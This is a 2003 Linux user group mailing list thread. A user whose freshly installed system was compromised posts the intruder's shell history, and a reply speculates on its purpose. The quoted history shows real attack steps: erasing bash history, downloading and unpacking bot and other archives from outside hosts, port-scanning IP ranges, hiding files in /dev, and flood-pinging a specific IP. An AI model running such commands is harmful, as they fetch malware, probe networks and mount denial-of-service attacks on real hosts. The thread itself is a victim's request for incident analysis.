[TCLUG] My linux has died

Thu Aug 21 08:11:37 CDT 2003

Looks like you've got Romanian script kiddies in your computer.  Well,
they have stuff stashed on Romanian servers anyway.  I'm curious about
this stuff myself.  I guess bot.tgz is a program that flood pings
203.144.243.10 (Asahi-Somboon ONLINE?)  What's bios.tgz?  And what are
the scan and serv commands doing with those IP addresses?  Hmmm?

> I think I have found the answer to my problems.  I got into a shell using
> disc 1 of the installation cds.  I switched to super user mode and saw
> various commands in the history that were not mine.  Someone got in earlier
> this week and did some bad things to my system.  Below is the history if
> anyone is interested in seeing what they were up to.  Any explanation of
> what they did is welcome.  It was pretty much a fresh install, so I wiped
> the disc and I am reinstalling.  I think I need to learn much more about
> security.
> 
> TOm
> 
> 
> 
> 
> 
> 
> history
> rm -rf .bash_history
> ls -al
> w
> cd /tmp/.cfg/
> cd samba
> ./scan 217 139 97 1
> ./scan 62 139 217 98
> ./serv 67.160.4.66
> ./scan 67 139 160 4
> ./scan 217 139 0 1
> ls -alF
> cat /etc/issue
> tar
> cd /tmp
> cd sh
> ls -alF
> tar -xzvf sh.tgz
> exit
> id
> wget djcc.go.ro/bios.tgz
> tar -xzvf bios.tgz
> tar -xzvf bios.tgz
> ls
> rm -rf bios.tgz
> ls
> ps -aux
> cat /proc/cpuinfo
> exit
> chmod 700 inst
> chmod +x inst
> exit
> mkdir /dev/targa
> cd /dev/targa
> wget mihai-doini.org/bot.tgz
> tar -xzvf bot.tgz
> exit
> ping -s -f 203.144.243.10 65500&
> ping -f -s 203.144.243.10 65500&
> ping -s -f 203.144.243.10 65500&
> ls
> cd /
> ping -s -f 203.144.243.10 65500&
> history | more
> history | vim
> history -w /tmp/hist.txt
> 
> 
> 
> _______________________________________________
> TCLUG Mailing List - Minneapolis/St. Paul, Minnesota
> http://www.mn-linux.org tclug-list at mn-linux.org
> https://mailman.real-time.com/mailman/listinfo/tclug-list

_______________________________________________
TCLUG Mailing List - Minneapolis/St. Paul, Minnesota
http://www.mn-linux.org tclug-list at mn-linux.org
https://mailman.real-time.com/mailman/listinfo/tclug-list